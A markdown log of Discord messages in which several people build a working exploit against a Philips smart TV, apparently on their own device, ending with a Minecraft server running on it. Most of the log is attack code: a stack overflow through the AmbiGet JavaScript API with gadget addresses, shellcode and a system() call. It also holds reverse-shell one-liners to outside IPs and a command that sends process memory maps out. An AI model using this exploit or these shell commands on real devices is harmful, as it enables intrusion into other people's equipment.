Philips_TV/files/28_apr_2020/discord.md

# Discord messages of interest
Development happened over a mix of text messages and voice chat; the messages below show how we progressed over time.
> ok so I found some stuff :^)
> ```
> // write primitive 4bytes
> // looks relatively safe to call (crashes with a 1 deref in strstr)
> PC = 0x23BCC
> R4 = address+0x880
> R11 = data
>
> // system call (SP buffer)
> PC = 0x15F3C or 0x15F70 or 0x15FA4 or 0x15FD8 // (latter = safer)
> R4 = R11 = unused
>
> // system call (R4 buffer)
> // looks super safe
> PC = 0x11D48 or 0x14108
> R4 = address of ascii string for system()
> R11 = unused
>
> // system call (R4 buffer) but probably unsafe
> PC = 0x2F3DC (super unsafe) or 0x2F52C
> R4 = address of ascii string for system()
> R11 = unused
> ```
> these are the useful gadgets
> there seems to be a memory area that stays static between runs, and is in a good address range
> thus it might be possible to use the write primitive to write a buffer for system there
> @Jan4V#0289
> You will still have to catch me up with what I should do though xd
> @Emily | Sunpy#5213
> can you send me the js you have for the AmbiGet?
> I wanna make a nicer setup for this and we can try
> @Jan4V#0289
> ```js
> new TV_JSP().tvServices.AmbiGet(0,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" +
> " >/tmp/b" + String.fromCharCode(0x70) + String.fromCharCode(0x5F) + String.fromCharCode(0x01)
> )
> ```
> @Emily | Sunpy#5213
> File: `exploit.js` (1.72 KB)
> this is the general idea
> but I wouldn't run this whole thing at first
> if/when you wanna mess with this mention me and I'll jump into voice
> @Jan4V#0289
> ``/dev/shm/shm_tmp/fusion.0.1``
> @Jan4V#0289
> File: `crashdump` (6.03 MB)
> @Emily | Sunpy#5213
> File: `crashdump` (181.60 KB)
> @Emily | Sunpy#5213
> ```js
> function executeShellcode(shellcode) {
> var payload = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
> payload += encodeInt(0x41414141);
> payload += encodeInt(0x42424242);
> payload += encodeInt(0x9EBA0404);
> for(let i = 0; i < 4194304; i++)
> {
> payload += encodeInt(0xE0A15005);
> }
> payload += shellcode;
> new TV_JSP().tvServices.AmbiGet(0, payload);
> }
> ```
> @Jan4V#0289
> http://shell-storm.org/blog/Shellcode-On-ARM-Architecture/
> @Emily | Sunpy#5213
> http://shell-storm.org/shellcode/files/shellcode-730.php
> @Jan4V#0289
> btw `"a".repeat(123)` is a thing
> @HoLLy#2750
> ```js
> function executeShellcode(shellcode) {
> var payload = "A".repeat(1036);
> payload += encodeInt(0x41414141);
> payload += encodeInt(0x42424242);
> payload += encodeInt(0x9EBA0404);
> for(let i = 0; i < 0x400000; i++)
> {
> payload += encodeInt(0xE0A15005);
> }
> payload += shellcode;
> new TV_JSP().tvServices.AmbiGet(0, payload);
> }
>
> executeShellcode(encodeInt(0xEF91337B));
> ```
> @Jan4V#0289
> File: `crashdump` (124.31 KB)
> @Emily | Sunpy#5213
>
> ```js
> function encodeInt(input) {
>     // little-endian 32-bit value as a 4-char string
>     return String.fromCharCode((input & 0xFF), ((input >> 8) & 0xFF), ((input >> 16) & 0xFF), ((input >> 24) & 0xFF));
> }
> function executeCommand(command) {
>     var payload = "A".repeat(1036);       // "A"*1036 is not string repetition in JS (evaluates to NaN)
>     payload += encodeInt(0x01011D48);     // 0x11D48 system() gadget + 0x01000000 (no NUL byte in the word)
>     payload += encodeInt(0x42424242);
>     payload += encodeInt(0x9EBA0404);
>     for(let i = 0; i < 0x400000; i++)
>     {
>         payload += encodeInt(0xE0A15005); // adc r5, r1, r5: harmless sled instruction
>     }
>     payload += encodeInt(0xE2444401);     // sub r4, r4, #0x01000000
>     payload += encodeInt(0xE1A0B004);     // mov r11, r4
>     payload += encodeInt(0xE28F4008);     // add r4, pc, #8: r4 = address of the command string below (pc reads as this instruction + 8)
>     payload += encodeInt(0xE1A0F00B);     // mov pc, r11
>     payload += encodeInt(0x41414141);
>     payload += encodeInt(0x42424242);
>     payload += command;
>     new TV_JSP().tvServices.AmbiGet(0, payload);
> }
>
> executeCommand("touch /tmp/jan4v.txt");
> ```
> @Jan4V#0289
> File: `crashdump` (124.31 KB) (DUPLICATE: No crashdump was generated and I did not pay attention to timestamp)
> @Emily | Sunpy#5213
> ``/dev/shm/shm_tmp/fusion.0.1``
> @Jan4V#0289
> File: `crashdump` (6.03 MB)
> @Emily | Sunpy#5213
> File: `crashdump` (167.34 KB)
> @Emily | Sunpy#5213
> ```js
> function encodeInt(input) {
>     // little-endian 32-bit value as a 4-char string
>     return String.fromCharCode((input & 0xFF), ((input >> 8) & 0xFF), ((input >> 16) & 0xFF), ((input >> 24) & 0xFF));
> }
>
> // overflow the AmbiGet buffer: 1040 bytes of padding, then the saved R4, R11 and return address (PC)
> function execute(pc, r4, r11) {
>     var payload = "A".repeat(1040);
>     payload += encodeInt(r4);
>     payload += encodeInt(r11);
>     payload += encodeInt(pc);
>     new TV_JSP().tvServices.AmbiGet(0, payload);
> }
>
> // 4-byte write gadget at 0x23BCC: R4 = address + 0x880, R11 = data
> function writeMemory4(address, data)
> {
>     execute(0x23BCC, address + 0x880, data);
> }
>
> // system() gadget at 0x11D48: R4 = address of the command string, R11 unused
> function callSystem(address)
> {
>     execute(0x11D48, address, 0x41414141);
> }
>
> // 0x7478742E is ".txt" in little-endian
> writeMemory4(0x8a55f040, 0x7478742E);
> ```
> @Jan4V#0289
> I mean you could already pwn the browser
> I believe
> so you could make it display any web page
> and we can read/write a bunch of files on the fs
> but sunpy is too scared to overwrite a script and get a shell that way, so we're doing the obviously safer way of corrupting the stack and jumping to the middle of a function, in the hope we can run a shell command that way :^)
> @HoLLy#2750
> We couldn't overwrite the scripts though
> @Shaddy#4422
> when I say "we" I basically mean an
> we tried like 1 script lol
> @HoLLy#2750
> we don't have permissions to write to the file
> we only have permissions to tmp
> @Emily | Sunpy#5213
> there's multiple places that get executed
> probably more places too though
> @HoLLy#2750
> We've tried multiple places
> @Shaddy#4422
> if there's a file/folder with incorrect permissions
> @HoLLy#2750
> That's the less exciting exploit anyway :^)
> @Shaddy#4422
> I tried to look for a script that *may* be in tmp that gets executed, as the people doesn't seem to be consistent
> but couldn't find any
> we have permissions to /3rd_rw as well
> @Emily | Sunpy#5213
> I'm going to jump out the window
> we can write commands to an ini file in read/write area
> @Emily | Sunpy#5213
> ``bash -i >& /dev/tcp/10.0.0.1/4242 0>&1``
> @Jan4V#0289
> @Emily | Sunpy#5213 `( sleep 300 ; echo "80" > /sys/class/leds/blue/brightness ) &`
> @HoLLy#2750
> https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
> http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
> @HoLLy#2750
> `( sleep 6 ; bash -i >& /dev/tcp/192.168.2.134/4242 0>&1 ) &`
> @Emily | Sunpy#5213
> ``( sleep 30; cat /proc/*/maps > /dev/tcp/127.0.0.1/4242; ) &``
> @Jan4V#0289
> File: `crashdump` (268.85 KB)
> @Emily | Sunpy#5213
> ![Terminal-tmux](img/img0.png "img0")
> @HoLLy#2750
> ```js
> function encodeInt(input) {
> return String.fromCharCode((input & 0xFF), ((input >> 8) & 0xFF), ((input >> 16) & 0xFF), ((input >> 24) & 0xFF));
> }
>
> function execute(pc, r4, r11) {
> var payload = "A".repeat(1040);
> payload += encodeInt(r4);
> payload += encodeInt(r11);
> payload += encodeInt(pc);
> new TV_JSP().tvServices.AmbiGet(0, payload);
> }
>
> function callSystem(address)
> {
> execute(0x11D48, address, 0x41414141);
> }
>
> callSystem(0x9CF55588);
> ```
> @Jan4V#0289
> ![cmd - nc -nlvp 1337](img/img1.png "img1")
> @Emily | Sunpy#5213
> ``/3rd/bin/wget https://busybox.net/downloads/binaries/1.31.0-defconfig-multiarch-musl/busybox-armv7l``
> ![openbox commands](img/img2.png "img2")
> @Jan4V#0289
> ``mount -t devpts none /dev/pts``
> @Jan4V#0289
> ![terminal](img/img3.png "img3")
> @Emily | Sunpy#5213
> https://cdn.azul.com/zulu-embedded/bin/zulu8.44.0.213-ca-jdk1.8.0_242-linux_aarch32hf.tar.gz
> @Jan4V#0289
> https://betacraft.pl/server-archive/minecraft/
> @Jan4V#0289
> https://download.cuberite.org/linux-armhf-raspbian/Cuberite.tar.gz
> @Jan4V#0289
> ``LD_LIBRARY_PATH=/lib:/3rd_rw/server``
> https://cdn.azul.com/zulu-embedded/bin/zulu8.44.0.213-ca-jdk1.8.0_242-linux_aarch32sf.tar.gz
> @Jan4V#0289
> ![minecraft server start](img/img4.png "img4")
> ![minecraft server still starting](img/img5.png "img5")
> @Emily | Sunpy#5213
> 569043771063ns loadtime :D
> @Emily | Sunpy#5213
> ![minecraft server running](img/img6.png "img6")
> @Emily | Sunpy#5213
> ```
> AllowTcpForwarding remote
> AllowStreamLocalForwarding no
> GatewayPorts yes
> ```
> @Jan4V#0289
> > minecraft code execution
> > \- Holly
> @Emily | Sunpy#5213